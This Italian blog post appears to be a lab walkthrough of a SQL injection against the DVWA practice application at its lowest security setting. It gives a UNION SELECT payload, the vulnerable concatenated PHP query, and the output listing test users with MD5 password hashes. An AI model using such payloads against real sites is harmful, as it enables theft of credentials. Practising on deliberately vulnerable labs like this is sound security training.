giovedì 10 ottobre 2013

SQL Injection con DVWA #1

Ottenere le password dal database di prova DVWA, con impostato il livello di protezione su low:

'UNION SELECT first_name, password FROM users #



Essendo la query SQL nella pagina:

$getid "SELECT first_name, last_name FROM users WHERE user_id = '$id'"

dopo aver inserito la stringa sopra riportata, la query "infettata" risulterà essere:

$getid "SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT first_name, password FROM users # '"

Il risultato è il seguente:

ID: 'UNION SELECT first_name, password FROM users #
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: 'UNION SELECT first_name, password FROM users #
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: 'UNION SELECT first_name, password FROM users #
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 'UNION SELECT first_name, password FROM users #
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 'UNION SELECT first_name, password FROM users #
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

Nessun commento:

Posta un commento